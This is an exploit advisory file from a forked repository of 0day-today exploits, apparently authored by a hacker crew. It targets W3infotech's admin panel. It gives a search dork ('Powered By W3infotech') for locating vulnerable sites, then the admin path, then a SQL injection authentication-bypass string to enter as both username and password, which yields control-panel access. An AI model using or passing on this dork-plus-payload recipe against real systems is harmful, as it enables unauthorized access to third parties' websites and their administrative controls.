forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10010.txt
31 lines (28 loc) · 1.57 KB
/
10010.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
W3infotech ( Auth Bypass ) SQL Injection Vulnerability
======================================================
[+]====================================================================||
[*] About : W3infotech ( Auth Bypass ) SQL injection Vulnerability ||
[!] Site : http://www.w3infotech.com ||
[!] Author : ViRuS_HiMa || ||
[!] Location : Cairo-007 ||
[!]====================================================================||
[!] [H]eL[L] [Z]on[E] [C]re[W] ||
[!]====================================================================||
[!]
[!] Exploitation : ||
[!]
[!] you can use this dork : "Powered By W3infotech" ||
[!]
[!] Just add the admin path ,, so it will be : ||
[!]
[!] http://server/admin ||
[!]
[!] then auth bypass using this password : ||
[!]
[!] hima' or 'a'='a ||
[!]
[!] it mean that you have to type the same code in user and pass ||
[!]
[!] what you got ?? ,, you are in the script control panel now :p ||
[!]
[!]====================================================================||